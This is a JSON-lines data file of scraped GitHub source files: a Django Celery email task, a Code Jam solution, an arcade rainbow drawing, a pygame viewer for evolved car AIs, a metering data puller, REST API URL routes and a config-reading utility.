{"seq_id":"5436502348","text":"from smtplib import SMTPException\n\nfrom django.conf import settings\nfrom django.core.mail import send_mail as send\n\nfrom config.celery import app\n\n\n@app.task\ndef send_mail(\n\t\tsubject: str,\n\t\tbody: str,\n\t\trecipient_list: str | list,\n\t\tfrom_email: str = settings.EMAIL_HOST_USER) -> dict:\n\t# Accept either a single address or a list; django's send_mail expects a list.\n\t# (The original wrapped recipient_list in [...] unconditionally, nesting lists.)\n\tif isinstance(recipient_list, str):\n\t\trecipient_list = [recipient_list]\n\ttry:\n\t\tsend(subject, body, from_email, recipient_list)\n\texcept SMTPException as ex:\n\t\tsubject = subject.encode('utf-8')\n\t\treturn {'Exception': ex, subject: recipient_list}\n\treturn {subject: recipient_list}\n
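\n# (Editor's sketch) Typical invocation from a view or service, dispatched through the\n# Celery broker rather than called inline; the address below is a placeholder:\n# send_mail.delay('Welcome', 'Thanks for signing up', 'user@example.com')\n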
","repo_name":"satan1437/Micro-link","sub_path":"users/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"23555449331","text":"t=int(input())\r\nfor t in range(t):\r\n    st=input()\r\n    st=list(st)\r\n    st.reverse()\r\n    #print(st)\r\n    print('Case #',end='')\r\n    print(t+1,end=': ')\r\n    for i in range(len(st)-1):\r\n        if(st[i]>=st[i+1]):\r\n            continue\r\n        else:\r\n            st[i+1]=str(int(st[i+1])-1)\r\n            for j in range(i+1):\r\n                st[j]='9'\r\n    \r\n    \r\n    st.reverse()\r\n    st=''.join(st)\r\n    print(int(st))\r\n    \r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/2387.py","file_name":"2387.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"36406335100","text":"import arcade  # explicit import: the class below references arcade.Window, which the star import does not bind\nfrom arcade import *\nfrom math import *\n\nSCREEN_HEIGHT = 600\nSCREEN_WIDTH = 600\n\nSCREEN_TITLE = \"Rainbow\"  # originally \\\"彩虹\\\" (rainbow)\n\n\nclass MyScan(arcade.Window):\n    def __init__(self, width, height, title):\n        super().__init__(width, height, title)\n        self.setup()\n\n    def setup(self):\n        set_background_color(color.WHITE)\n        self.color = [color.RED, color.ORANGE, color.YELLOW,\n                      color.LIGHT_GREEN, color.BLUE, color.PURPLE, color.MAGENTA]\n\n    def on_draw(self):\n        start_render()\n        self.mydraw()\n\n    def mydraw(self):\n        oy, ox = SCREEN_HEIGHT//2, SCREEN_WIDTH // 2\n        r = 200\n        for i in range(len(self.color)):  # draw every band (the original stopped at 6 of the 7 colors)\n            draw_arc_outline(ox, oy, r + 10 * i, r + 10 * i, self.color[i],\n                             0, 180, 10)\n\n\nif __name__ == '__main__':\n    game = MyScan(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)\n    run()\n","repo_name":"PythonOrC/PythonCodeArchive","sub_path":"program/科学与历史主题包/Arcade/彩虹.py.py","file_name":"彩虹.py.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"32687533961","text":"import pygame\nimport math\nimport roads\nfrom car_ai_instance import *\nfrom car_ai_utils import *\nimport random\nimport numpy as np\nimport torch\nimport time\nimport os\n\npygame.init()\n\nGRAY = (100, 100, 100)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 100, 100)\nGREEN = (100, 255, 100)\n\nif __name__ == \"__main__\":\n    display_width = 800\n    display_height = 600\n    fps = 30\n    brain_dir = \"./brains/2021-03-25 22_46_46.231196\"  # renamed from 'dir' to avoid shadowing the builtin\n\n    gameDisplay = pygame.display.set_mode((display_width, display_height))\n    clock = pygame.time.Clock()\n    pygame.display.set_caption('Car')\n    font = pygame.font.SysFont('arialblack', 18)\n\n    crashed = False\n    running_time = 0.0\n    gen = 0\n\n    data = dataloader([roads.road2, roads.road3], 50)\n    files = os.listdir(brain_dir)\n    def get_gen(x):\n        s = x.split('s')[0]\n        return int(s[3:])\n    files.sort(key=get_gen)\n\n    agent = car_ai_instance(pos=data.get_data().pos, angle=data.get_data().angle)\n    agent.brain = torch.load(brain_dir + '/' + files[0])['model']\n    print('Showing:', files[0])\n\n    key_pressed = {\n        'right': False,\n        'left': False,\n        'up': False,\n        'down': False,\n        'space': False\n    }\n\n    while not crashed:\n        gameDisplay.fill(GRAY)  # the color constants are defined in upper case above\n\n        agent.tick(clock.get_time()/1000, gameDisplay, data.get_data().data, data.get_data().goals, show=True)\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                crashed = True\n\n            if event.type == pygame.KEYDOWN:\n                if event.key == pygame.K_s:\n                    agent.car.is_done = True\n\n        for seg in data.get_data().data:\n            seg.show(gameDisplay, WHITE)\n        for goal in data.get_data().goals:\n            goal.show(gameDisplay, GREEN)\n\n        running_time += clock.get_time()/1000\n        if agent.car.is_done:\n            running_time = 0\n            gen += 1\n            if gen >= len(files):\n                break\n            agent = car_ai_instance(pos=data.get_data().pos, angle=data.get_data().angle)\n            agent.brain = torch.load(brain_dir + '/' + files[gen])['model']\n            print('Showing:', files[gen])\n            data.step()\n\n        text1 = font.render('gen ' + str(gen), True, WHITE)\n        text2 = font.render('score: ' + str(round(agent.score)), True, WHITE)\n        gameDisplay.blit(text1, (1, 1))\n        gameDisplay.blit(text2, (1, 15))\n\n        pygame.display.update()\n        clock.tick(fps)\n\n    pygame.quit()\n    quit()","repo_name":"thomashayama/car_evolution","sub_path":"car_ai_viewer.py","file_name":"car_ai_viewer.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"34810734825","text":"from __future__ import unicode_literals\n\nimport datetime\nimport platform\nimport random\n\nfrom oslo_config import cfg\nfrom watcher_metering.agent.measurement import Measurement\nfrom watcher_metering.agent.puller import MetricPuller\n\n\nclass RandomDataPuller(MetricPuller):\n    \"\"\"\n    This is a demo driver which shows how a driver should be implemented in\n    order to gather data from a source\n    \"\"\"\n    def __init__(self, title, probe_id, interval, static_data):\n        super(RandomDataPuller, self).__init__(title, probe_id, interval)\n        self.static_data = static_data\n\n    @classmethod\n    def get_config_opts(cls):\n        return cls.get_base_opts() + [\n            cfg.StrOpt('static_data', default=\"static_data\", required=True),\n        ]\n\n    @classmethod\n    def get_name(cls):\n        return \"random\"\n\n    @classmethod\n    def get_default_probe_id(cls):\n        return \"data.puller.random\"\n\n    @classmethod\n    def get_default_interval(cls):\n        return 5 # In seconds\n\n    def do_pull(self):\n        random_value = random.Random().randint(1, 10)\n        random_message = \"[%s] random data generated on %s\" % (\n            random_value, datetime.datetime.now()\n        )\n        measurement = Measurement(\n            name=self.probe_id,\n            unit=\"\",\n            type_=\"\",\n            value=random_value,\n            resource_id=platform.node(),\n            resource_metadata={\n                \"state\": \"ok\",\n                \"static_data\": self.static_data,\n                \"description\": random_message\n            },\n        )\n        return [measurement]\n","repo_name":"b-com/watcher-metering","sub_path":"watcher_metering/drivers/examples/random-puller/random_puller/puller.py","file_name":"puller.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
{"seq_id":"33616590026","text":"from rest_framework.routers import DefaultRouter\nfrom .views import PostViewSet, CommentViewSet, \\\n    GroupViewSet, FollowViewSet\nfrom django.urls import include, path\nfrom rest_framework_simplejwt.views import TokenObtainPairView,\\\n    TokenRefreshView, TokenVerifyView\n\n\napp_name = 'api'\n\nv1_router = DefaultRouter()\n\nv1_router.register('posts', PostViewSet)\nv1_router.register('groups', GroupViewSet)\n# The capture group's name was lost in extraction; 'post_id' restored here, which is\n# presumably the kwarg CommentViewSet looks up.\nv1_router.register(r'posts/(?P<post_id>\\d+)/comments',\n                   CommentViewSet, basename='comments')\nv1_router.register('follow', FollowViewSet, basename='follow')\n
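\n# (Editor's note, added) With DefaultRouter these registrations expose, among others:\n#   /v1/posts/, /v1/groups/, /v1/follow/, and the nested\n#   /v1/posts/<post_id>/comments/ routes (plus the usual detail routes).\n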
\nurlpatterns = [\n    path('v1/', include(v1_router.urls)),\n    path('v1/jwt/create/', TokenObtainPairView.as_view(),\n         name='token_obtain_pair'),\n    path('v1/jwt/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n    path('v1/jwt/verify/', TokenVerifyView.as_view(), name='token_verify'),\n]\n","repo_name":"marusya-svet/api_final_yatube","sub_path":"yatube_api/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"44218326496","text":"import configparser\nimport logging\n\n\ndef default_logger():\n    log_format = '%(asctime)s - %(name)s - [%(levelname)s] - %(message)s'  # renamed from 'format' to avoid shadowing the builtin\n    logging.basicConfig(format=log_format, level=logging.INFO, filename='test.log', filemode='a')\n    logger = logging.getLogger('test_logger')\n    return logger\n\n\ndef read_config_file(path_ini):\n    conf_dict = {}\n    conf = configparser.RawConfigParser()\n    conf.read(path_ini)\n    for section in conf.sections():\n        conf_dict[section] = {opt: val for opt, val in conf.items(section)}\n\n    return conf_dict\n","repo_name":"Stein13/YehorZdobnikovTestProject","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}